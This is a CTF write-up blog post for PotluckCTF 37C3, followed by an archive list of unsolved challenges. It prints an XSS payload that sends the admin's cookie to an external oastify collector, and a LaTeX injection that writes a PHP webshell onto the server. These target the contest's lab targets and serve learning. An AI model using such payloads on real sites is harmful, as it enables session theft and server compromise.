<!DOCTYPE html>
<!-- `site.alt_lang` can specify a language different from the UI --><html lang="en" data-mode="dark">
  <!-- The Head -->

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
    <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="viewport" content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover">
  
    
  
    
      
  
      
        
        
  
        
          <!-- it's a local file path -->
  
        
      
    
  
    
      <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.4">
<meta property="og:title" content="PotluckCTF 37C3 - Challenges/Writeups">
<meta property="og:locale" content="en">
<meta name="description" content="My team participated in the 37C3 PotluckCTF and got one challenge, though I personally got painfully close to another one… The following is a writeup/walkthrough of how each flag was grabbed and the thought process for each.">
<meta property="og:description" content="My team participated in the 37C3 PotluckCTF and got one challenge, though I personally got painfully close to another one… The following is a writeup/walkthrough of how each flag was grabbed and the thought process for each.">
<link rel="canonical" href="https://seall.dev/posts/37c3potluckctf">
<meta property="og:url" content="https://seall.dev/posts/37c3potluckctf">
<meta property="og:site_name" content="sealldev">
<meta property="og:image" content="https://seall.dev/images/ctfs/37c3potluckctf/icon.png">
<meta property="og:type" content="article">
<meta property="article:published_time" content="2023-12-30T00:00:00+11:00">
<meta name="twitter:card" content="summary_large_image">
<meta property="twitter:image" content="https://seall.dev/images/ctfs/37c3potluckctf/icon.png">
<meta property="twitter:title" content="PotluckCTF 37C3 - Challenges/Writeups">
<meta name="twitter:site" content="@sealldev">
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2023-12-30T00:00:00+11:00","datePublished":"2023-12-30T00:00:00+11:00","description":"My team participated in the 37C3 PotluckCTF and got one challenge, though I personally got painfully close to another one… The following is a writeup/walkthrough of how each flag was grabbed and the thought process for each.","headline":"PotluckCTF 37C3 - Challenges/Writeups","image":"https://seall.dev/images/ctfs/37c3potluckctf/icon.png","mainEntityOfPage":{"@type":"WebPage","@id":"https://seall.dev/posts/37c3potluckctf"},"url":"https://seall.dev/posts/37c3potluckctf"}</script>
<!-- End Jekyll SEO tag -->

    
  
    <title>PotluckCTF 37C3 - Challenges/Writeups | sealldev
    </title>
  
    <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="sealldev">
<meta name="application-name" content="sealldev">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">

  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com">
        <link rel="dns-prefetch" href="https://fonts.googleapis.com">
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="preconnect" href="https://fonts.googleapis.com">
        <link rel="dns-prefetch" href="https://fonts.googleapis.com">
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net">
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net">
      
        <link rel="preconnect" href="https://cdnjs.cloudflare.com">
        <link rel="dns-prefetch" href="https://cdnjs.cloudflare.com">
      
  
      <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&amp;display=swap">
    
  
    <!-- GA -->
    
  
    <!-- Bootstrap -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css">
  
    <!-- Font Awesome -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.5.1/css/all.min.css">
  
    <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">
  
    
      <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.25.0/dist/tocbot.min.css">
    
  
    
      <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
    
  
    
      <!-- Manific Popup -->
      <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css">
    
  
    <!-- JavaScript -->
  
    
  
    <!-- A placeholder to allow defining custom metadata -->


    <!-- Colour change -->
    <link rel="stylesheet" href="/assets/css/colour-changes.css">
  </head>
  

  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/images/logo.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <h1 class="site-title">
      <a href="/">sealldev</a>
    </h1>
    <p class="site-subtitle fst-italic mb-0"></p>
<p>Cybersecurity Student | <b style="color:#ae3af2">CTF Player</b>, learning <b style="color:#d62013">Red Teaming</b> and <b style="color:#4c3af2">Penetration Testing</b></p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            

            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tag"></i>
            

            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            

            <span>WHOAMI</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    

    
      

      
        <a href="https://github.com/sealldeveloper" aria-label="github" target="_blank" rel="noopener noreferrer">
          <i class="fab fa-github"></i>
        </a>
      
    
      

      
        <a href="https://twitter.com/sealldev" aria-label="twitter" target="_blank" rel="noopener noreferrer">
          <i class="fab fa-twitter"></i>
        </a>
      
    
      

      
        <a href="https://www.linkedin.com/in/noah-cooper-5442ab309/" aria-label="linkedin" target="_blank" rel="noopener noreferrer">
          <i class="fab fa-linkedin"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div id="topbar" class="d-flex align-items-center justify-content-between px-lg-3 h-100">
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">Home</a>
            </span>

          
        
          
        
          
            
              <span>PotluckCTF 37C3 - Challenges/Writeups</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search...">
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  




<!-- return -->




<article class="px-1">
  <header>
    <h1 data-toc-skip>PotluckCTF 37C3 - Challenges/Writeups</h1>

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time data-ts="1703854800" data-df="ll" data-bs-toggle="tooltip" data-bs-placement="bottom">
  Dec 30, 2023
</time>

      </span>

      <!-- lastmod date -->
      

      
        
        
        

        

        <div class="mt-3 mb-3">
          <a href="/images/ctfs/37c3potluckctf/icon.png" class="popup img-link preview-img shimmer"><img src="/images/ctfs/37c3potluckctf/icon.png" alt="Preview Image" width="1200" height="630" loading="lazy"></a>
</div>
      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              <a href="https://github.com/sealldeveloper">sealldev</a>
            
          </em>
        </span>

        <!-- read time -->
        <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span class="readtime" data-bs-toggle="tooltip" data-bs-placement="bottom" title="2239 words">
  <em>12 min</em> read</span>

      </div>
      <!-- .d-flex -->
    </div>
    <!-- .post-meta -->
  </header>

  <div class="content">
    <p>My team participated in the 37C3 PotluckCTF and got one challenge, though I personally got painfully close to another one… The following is a writeup/walkthrough of how each flag was grabbed and the thought process for each.</p>

<p>You can join the Discord community for this CTF (with more writeups!) <a href="https://discord.gg/nFQHHjCmU3">here</a>.</p>

<h2 id="webencoderchef-161-solves">
<span class="me-2">web/Encoderchef (161 solves)</span><a href="#webencoderchef-161-solves" class="anchor text-muted"><i class="fas fa-hashtag"></i></a>
</h2>
<p>Created by: <code class="language-plaintext highlighter-rouge">ntomsic</code></p>

<blockquote>
  <p>I heard Cyberchef is monitored by GCHQ so I am trying to build my own version. It is still under construction so if you see any problems with the site just send a link to the admin and they will have a look :) // (Flag is in admin cookie)</p>
</blockquote>

<p>Our site is a converter of text to various formats, like base64, hex, binary, etc.</p>

<p><a href="/images/ctfs/37c3potluckctf/encoderchef_1.png" class="popup img-link  shimmer"><img src="/images/ctfs/37c3potluckctf/encoderchef_1.png" alt="Converter" loading="lazy"></a></p>

<p>We are also given the source code of the page, aswell as an ‘admin’ page. This ‘admin’ page has a URL input for the admin to visit.</p>

<p><a href="/images/ctfs/37c3potluckctf/encoderchef_2.png" class="popup img-link  shimmer"><img src="/images/ctfs/37c3potluckctf/encoderchef_2.png" alt="Admin URL Visiting Page" loading="lazy"></a></p>

<p>If we can find an exploit to steal the admin’s cookies (as they said in the description). We get the flag!</p>

<div class="language-php highlighter-rouge">
<div class="code-header">
        <span data-label-text="PHP"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button>
</div>
<div class="highlight"><code><table class="rouge-table"><tbody><tr>
<td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td>
<td class="rouge-code"><pre><span class="nv">$output</span> <span class="o">=</span> <span class="s2">"Example output"</span><span class="p">;</span>
<span class="k">if</span> <span class="p">((</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"input"</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="nb">is_null</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"input"</span><span class="p">]))</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"encoding"</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="nb">is_null</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"encoding"</span><span class="p">]))){</span>
	<span class="nv">$input</span> <span class="o">=</span> <span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"input"</span><span class="p">]);</span>

	<span class="k">if</span><span class="p">(</span><span class="nv">$input</span> <span class="o">===</span> <span class="kc">false</span><span class="p">){</span>
		<span class="nv">$output</span> <span class="o">=</span> <span class="s2">"Invalid input"</span><span class="p">;</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="k">switch</span> <span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"encoding"</span><span class="p">])</span> <span class="p">{</span>
			<span class="k">case</span> <span class="s2">"base64"</span><span class="o">:</span>
				<span class="nv">$output</span> <span class="o">=</span> <span class="nb">base64_encode</span><span class="p">(</span><span class="nv">$input</span><span class="p">);</span>
				<span class="k">break</span><span class="p">;</span>
</pre></td>
</tr></tbody></table></code></div>
</div>
<p>A portion of the code catches my eye, specifically the base64 input. If we can put in a base64 input that decodes to HTML tags, we can cause an XSS!</p>

<p>Payload:</p>

<div class="language-html highlighter-rouge">
<div class="code-header">
        <span data-label-text="HTML"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button>
</div>
<div class="highlight"><code><table class="rouge-table"><tbody><tr>
<td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td>
<td class="rouge-code"><pre><span class="nt">&lt;/textarea&gt;</span>
<span class="nt">&lt;script&gt;</span>
<span class="nx">i</span><span class="o">=</span><span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">"</span><span class="s2">img</span><span class="dl">"</span><span class="p">);</span>
<span class="nx">i</span><span class="p">.</span><span class="nx">src</span><span class="o">=</span><span class="dl">"</span><span class="s2">https://******************************.oastify.com?c=</span><span class="dl">"</span><span class="o">+</span><span class="nf">btoa</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">);</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">i</span><span class="p">);</span>
<span class="nt">&lt;/script&gt;</span>
<span class="nt">&lt;textarea&gt;</span>
</pre></td>
</tr></tbody></table></code></div>
</div>

<p>Encoding our payload with Base64 and then URL encoding it, and making a final url gives us this: <code class="language-plaintext highlighter-rouge">http://[url]:31337/?encoding=base64&input=[payload]</code></p>

<p>And sending it to the admin, sends us back our Base64 encoded cookies with our flag!</p>

<p>Flag: <mark>flag="potluck{uu_make_me_go_crazy}"</mark></p>

<p><strong>Files:</strong> None provided :(</p>

<h2 id="websantify-58-solves">
<span class="me-2">web/Santify (58 solves)</span><a href="#websantify-58-solves" class="anchor text-muted"><i class="fas fa-hashtag"></i></a>
</h2>
<p>Created by: <code class="language-plaintext highlighter-rouge">13x1</code></p>
<blockquote>
  <p>I found this shop that claims to provide ““delivery via reindeer sleigh””. I ordered a few things, but the cards did not arrive on time! Please find out what went wrong.<br>Anyway, check out their web page<br>Note: Any accounts named ADMIN, BOT or similar are regular users and not part of the challenge, please ignore them</p>
</blockquote>

<p><strong>I didn’t completely solve this challenge during the CTF, but got painfully close…</strong></p>

<p>The card creation page is the following:</p>

<p><a href="/images/ctfs/37c3potluckctf/santify_1.png" class="popup img-link  shimmer"><img src="/images/ctfs/37c3potluckctf/santify_1.png" alt="Card Creation" loading="lazy"></a></p>

<p>The header text is of key importance, as it mentions <code class="language-plaintext highlighter-rouge">pdflatex</code>. LaTeX has some interesting capabilities that are listed nicely on <a href="https://swisskyrepo.github.io/PayloadsAllTheThings/LaTeX%20Injection">PayloadAllTheThings</a>.</p>

<p>Injecting some math operation in LaTeX, I try to read a ‘flag’…</p>

<p><a href="/images/ctfs/37c3potluckctf/santify_2.png" class="popup img-link  shimmer"><img src="/images/ctfs/37c3potluckctf/santify_2.png" alt="LFI Attempt" loading="lazy"></a></p>

<p>… Fair enough.</p>

<p>I found that we have the capabilites to write files, by doing the following.</p>

<div class="language-latex highlighter-rouge">
<div class="code-header">
        <span data-label-text="LaTex"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button>
</div>
<div class="highlight"><code><table class="rouge-table"><tbody><tr>
<td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td>
<td class="rouge-code"><pre><span class="k">\newwrite\outfile</span>
<span class="k">\openout\outfile</span>=test.log
<span class="k">\write\outfile</span><span class="p">{</span>test!<span class="p">}</span>
<span class="k">\closeout\outfile</span>
</pre></td>
</tr></tbody></table></code></div>
</div>

<p>Looking at our LaTeX log were given where the files are uploaded, from there we can look at our uploaded file. Cool, now what…</p>

<p>We can’t really ‘read’ the binary as LaTeX isn’t very good at handling extended unicode without importing packages, and trying to run the command injection payloads fails as they are using the <code class="language-plaintext highlighter-rouge">-no-shell-escape</code> flag, which restricts usage of <code class="language-plaintext highlighter-rouge">/write18{cmd}</code>.</p>

<p><strong>This part I did not get during the competition.</strong></p>

<p>What I needed to do was write a PHP webshell, as the website is run on PHP which can be seen in file names in other portions of the site (index.php, send-card.php, render-LaTeX.php, etc.).</p>

<div class="language-latex highlighter-rouge">
<div class="code-header">
        <span data-label-text="LaTex"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button>
</div>
<div class="highlight"><code><table class="rouge-table"><tbody><tr>
<td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td>
<td class="rouge-code"><pre><span class="k">\newwrite\outfile</span>
<span class="k">\openout\outfile</span>=cmd.php
<span class="k">\write\outfile</span><span class="p">{</span>&lt;?php system("/app/readflag");<span class="p">}</span>
<span class="k">\closeout\outfile</span>
</pre></td>
</tr></tbody></table></code></div>
</div>

<p>Now you visit the endpoint it was uploaded to (<code class="language-plaintext highlighter-rouge">/images/&lt;random guid&gt;/cmd.php</code>) you will see the flag.</p>

<p><strong>Files:</strong> None provided :(</p>

<h2 id="thanks-for-reading">
<span class="me-2">Thanks for reading!</span><a href="#thanks-for-reading" class="anchor text-muted"><i class="fas fa-hashtag"></i></a>
</h2>
<p>Feel free to give me feedback or follow me on <a href="https://twitter.com/sealldev">Twitter</a> and <a href="https://www.linkedin.com/in/noah-cooper-5442ab309/">LinkedIn</a>.</p>

<p>You can also find my other contacts on the <a href="../about">whoami</a> page.</p>

<h2 id="unsolved--challenge-archival">
<span class="me-2">Unsolved &amp; Challenge Archival</span><a href="#unsolved--challenge-archival" class="anchor text-muted"><i class="fas fa-hashtag"></i></a>
</h2>
<p>A list of challenges I didn’t solve, and the downloads (if provided) to try them for yourself! All challenges are sorted by solve count.</p>

<h3 id="cryptography---04-solved">
<span class="me-2">cryptography - 0/4 solved</span><a href="#cryptography---04-solved" class="anchor text-muted"><i class="fas fa-hashtag"></i></a>
</h3>

<details>
  <summary>lima beans with lemon and lime - 28 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">Pwnagaukar, DagurB</code></p>

  <blockquote>
    <div class="table-wrapper"><table>
      <tbody>
        <tr>
          <td>It was just yesterday when I was making my favorite dish (lima beans with lemon and lime) that I realised I could turn my favorite dish (lima beans with lemon and lime) into a unpenetrable cryptosystem 32 times stronger than AES.<br>I, of course immediately patented the cryptosystem so that other people could not steal my idea.<br>I will let you try out my cryptosystem, but you will only be allowed to encrypt data, not decrypt it, so that you can’t steal my cryptosystem.<br>If you find any vulnerability with the cryptosystem then please send me proof by decrypting the flag.<br>In the words of my grandfather (Albert Einstein)<br>“”Man I love lima beans with lemon and lime, also PoC</td>
          <td> </td>
          <td>GTFO””</td>
        </tr>
      </tbody>
    </table></div>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230023208/https://storage.googleapis.com/potluckctf/challenge18-dist.tgz">challenge18-dist.tgz</a></p>
</details>

<details>
  <summary>Upside-down Cake - 21 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">Neobeo</code></p>

  <blockquote>
    <p>Let’s bake a cake – an upside-down cake full of secrets! Ready to flip the script?</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230023357/https://storage.googleapis.com/potluckctf/challenge16-dist.tgz">challenge16-dist.tgz</a></p>
</details>

<details>
  <summary>abc - 18 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">dorian</code></p>

  <blockquote>
    <p>Alice, Bob, and Charlie are coordinating a potluck.</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230023523/https://storage.googleapis.com/potluckctf/challenge03-dist.tgz">challenge03-dist.tgz</a></p>
</details>

<details>
  <summary>Cookmaster 1 - 1 solve</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">gmerz &amp; cluosh from We_0wn_Y0u</code></p>

  <blockquote>
    <p>It’s the potluck season again! But as every year, that damn dude Jerry brought his special Cookmaster and is stealing the show with his secret sauce! But not this year. It’s time to teach him a lesson! Can you steal the recipe for his secret sauce and corrupt his Cookmaster to put a bad taste to his food?<br>You even bought your own Cookmaster to try everything before you can pull of your heist during the potluck!<br>Flag 1: Can you access the system and extract the secret sauce? Flag 2: Great, you got system access! Now all that’s left to do, hack the system and corrupt the heater to grill his sauce!</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230022938/https://storage.googleapis.com/potluckctf/challenge17-dist.tgz">challenge17-dist.tgz</a></p>
</details>

<h3 id="misc---05-solved">
<span class="me-2">misc - 0/5 solved</span><a href="#misc---05-solved" class="anchor text-muted"><i class="fas fa-hashtag"></i></a>
</h3>

<details>
  <summary>tacocat - 27 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">Les Amateurs: HELLOPERSON, unvariant.winter, stuxf</code></p>

  <blockquote>
    <p>We weren’t sure what to bring to the potluck, but we figured another pyjail would always be welcome.</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230014746/https://storage.googleapis.com/potluckctf/challenge28-dist.tgz">challenge28-dist.tgz</a></p>
</details>

<details>
  <summary>baby sekurbut - 25 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">plonk</code></p>

  <blockquote>
    <p>This weird arcade machine just got delivered to you. It seems broken, but there’s a serial port on the back. You connect, and are greeted with a weird shell…<br><br>Note (relevant for part 2: sekurbut): For fairness, we’ve re-hosted the previous version as well at challenge30.play.potluckctf.com If you have found a bug that works there but not on the newer versions, don’t waste time on it, it’s an unintended red herring. The intended solution works on both version. The change in offsets in the bootloader is not relevant to the exploit.</p>
  </blockquote>

  <p><strong>Files:</strong> None provided :(</p>
</details>

<details>
  <summary>Hungry Helmsman - 16 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">p4ck3t0, diff-fusion</code></p>

  <blockquote>
    <p>Welcome, chefs of the Kubernetes kitchen! The hungry Helmsman is on the lookout for a unique feast, and his palate is set on flags. Embark on the “Hungry Helmsman” challenge, where Kubernetes prowess meets culinary finesse. Craft the ultimate deployment to reveal the flag!</p>
  </blockquote>

  <p><strong>Files:</strong> None provided :(</p>
</details>

<details>
  <summary>Emacro-wave cooking - 6 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">tabun-dareka</code></p>

  <blockquote>
    <p>Why did the Emacs user bring a keyboard to the restaurant? They wanted to have a “Ctrl” over their spaghetti code!</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230015200/https://storage.googleapis.com/potluckctf/challenge13-dist.tgz">challenge13-dist.tgz</a></p>
</details>

<details>
  <summary>Shell No Evil - 6 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">potduck</code></p>

  <blockquote>
    <blockquote>
      <p>Due to the special background of the R&amp;D unit of Sunway CPU, the SW64 instruction set has not been made public so far. Although non-disclosure of the instruction set is very detrimental to the construction of the software ecosystem, it also prevents malicious attackers from writing shellcode targeting Sunway processors, and the product has extremely high self-security. [1]<br>🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣<br>Surely writing shellcode for an ““unknown”” architecture is impossible, right, right???<br>Note: Flag located at /flag_(a random uuid), there is no /bin/sh.<br>[1] Machine translated, source: https://k-sina-cn.translate.goog/article_5952916295_162d24b47019001k3l.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=zh-CN&_x_tr_pto=wapp</p>
    </blockquote>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230014458/https://storage.googleapis.com/potluckctf/challenge12-dist.tgz">challenge12-dist.tgz</a></p>
</details>

<h3 id="pwn---09-solved">
<span class="me-2">pwn - 0/9 solved</span><a href="#pwn---09-solved" class="anchor text-muted"><i class="fas fa-hashtag"></i></a>
</h3>

<details>
  <summary>Ezrop - 48 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">S2G, Carixo</code></p>

  <blockquote>
    <p>Pretty standard ret2libc pwn challenge.</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230021841/https://storage.googleapis.com/potluckctf/challenge19-dist.tgz">challenge19-dist.tgz</a></p>
</details>

<details>
  <summary>Schrödinger's P1G - 11 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">uz56764</code></p>

  <blockquote>
    <p>A Virtual Machine containing a poor pig. And 0 and 1</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230021650/https://storage.googleapis.com/potluckctf/challenge21-dist.tgz">challenge21-dist.tgz</a></p>
</details>

<details>
  <summary>sekurbut - 8 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">plonk</code></p>

  <blockquote>
    <p>The previous owner of the arcade machine still has a trace of the firmware update. Maybe there’s a way to run your own firmware?<br><br>Note 1: This challenge was updated at 2023-12-29 00:20 UTC. If you solved part 1 before this time, you will need to re-run your exploit to get the current version of the data.<br><br>Note 2: The “reset” function will also reset the flash memory.<br><br>Note 3: For fairness, we’ve re-hosted the previous version as well at challenge30.play.potluckctf.com If you have found a bug that works there but not on the newer versions, don’t waste time on it, it’s an unintended red herring. The intended solution works on both version. The change in offsets in the bootloader is not relevant to the exploit.</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230022742/https://storage.googleapis.com/potluckctf/challenge23-dist.tgz">challenge23-dist.tgz</a></p>
</details>

<details>
  <summary>auxv - 4 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">dfyz (Ivan Komarov)</code></p>

  <blockquote>
    <p>Connect to the remote server with <code class="language-plaintext highlighter-rouge">nc -nv challenge09.play.potluckctf.com *****</code>. For detailed instructions, see README.md in the provided challenge09-dist.tgz file.</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230022231/https://storage.googleapis.com/potluckctf/challenge09-dist.tgz">challenge09-dist.tgz</a></p>
</details>

<details>
